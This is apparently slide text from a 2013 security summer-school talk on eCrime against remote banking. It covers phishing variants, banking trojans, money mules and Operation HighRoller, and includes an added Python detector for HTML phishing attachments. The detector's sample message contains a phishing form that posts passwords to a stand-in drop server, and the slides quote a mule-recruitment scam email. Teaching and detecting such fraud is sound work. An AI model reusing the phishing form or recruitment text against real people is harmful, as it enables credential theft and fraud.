The evolution of eCrime and the remote banking channels. Presentation to the RHUL MSc Information Security Summer School 9 September 2013 Dom Lucas. Overview. Setting the Scene Attacks & Exploits Monetising the attack The bigger picture. Setting the Scene. What is eCrime?.
The evolution of eCrime and the remote banking channels
Presentation to the RHUL MSc Information Security Summer School
9 September 2013
Dom Lucas
Overview
• Setting the Scene
• Attacks & Exploits
• Monetising the attack
• The bigger picture
Why?
In economic terms
• Wider Market Base.
• Greater ROI.
• Cost/Benefit Model.
In criminal terms
"I rob banks 'cos that's where the money is" (Willie Sutton, c1930)
Phishing Explained
1. Attacker creates / hijacks website
2. Phishing email sent
3. Victim directed to phishing site
4. Phished credentials forwarded to drop server
5. Creds forwarded to phisher
6. Creds traded on online forums
7. Phishers use credentials to access genuine accounts
Phishing evolved
• MITM/Real-time Phishing: Capture & use victim 2-FA pass code in real time, thus defeating multi-factor authentication.
• HTML form attachment: Doesn't require a phishing site and so evades traditional phishing takedown.
• Vishing & Smishing: Use of traditional social engineering techniques to gather credentials. Use of VOIP technology to spoof & evade detection.
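Because the HTML form attachment variant has no hosted phishing page to take down, one place to catch it is the mail gateway. The sketch below is an added example, not part of the original presentation: it flags HTML attachments containing a password form that posts to a remote host. The function name, the sample message and the host names are assumptions constructed for illustration.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormFinder(HTMLParser):
    """Records each <form> action and whether that form has a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []  # entries are [action, has_password]

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([a.get("action") or "", False])
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1][1] = True

def suspicious_form_attachments(raw_message):
    """Return (filename, remote_host) per HTML attachment whose password form posts off-box."""
    hits = []
    for part in message_from_string(raw_message).walk():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html"))
        if part.get_content_disposition() != "attachment" or not is_html:
            continue
        body = (part.get_payload(decode=True) or b"").decode(  # also undoes base64/QP
            part.get_content_charset() or "utf-8", "replace")
        finder = FormFinder()
        finder.feed(body)
        for action, has_password in finder.forms:
            host = urlparse(action).hostname  # None for relative or empty actions
            if has_password and host:
                hits.append((name, host))
    return hits

# Constructed sample message (not real traffic); every name is a placeholder.
SAMPLE = """\
From: alerts@bank.example
Subject: Verify your account
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="verify.html"

<form method="post" action="http://collector.example/drop.php">
<input type="text" name="user"><input type="password" name="pass"></form>
--B1--
"""
```

Forms that submit through script rather than an `action` attribute are not covered by this check.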
Malware
• Carberp
• ICE IX
• ZEUS
• Spyeye
• Citadel
• Shylock
Attack vectors www.XXX.com
Beneficiaries/Money Mules
Job offer: We have found your resume at Monster.com and would like to suggest you a "Transfer manager" vacancy. We have thoroughly studied your resume and are happy to inform you that your skills completely meet our requirements for this position. Our company buy, sell, and exchange digital currencies, like E-gold and E-bullion.
• Continues to be the Bottleneck
  • lots of credentials, not enough mule accounts
• Money Mule categories
  • The professionals
  • The unsuspecting/duped
• Developments
  • Pre-Paid card accounts - lack of KYC
  • Fake online businesses
  • International Payments (SEPA)
    • International fraud payments to mule accounts across the EU.
Op HighRoller
• Customised Zeus / Spyeye variant.
• Automated.
• Checked balance.
• High net-worth accounts >€200,000.
• Targeted over 60 institutions
• Global network of mules.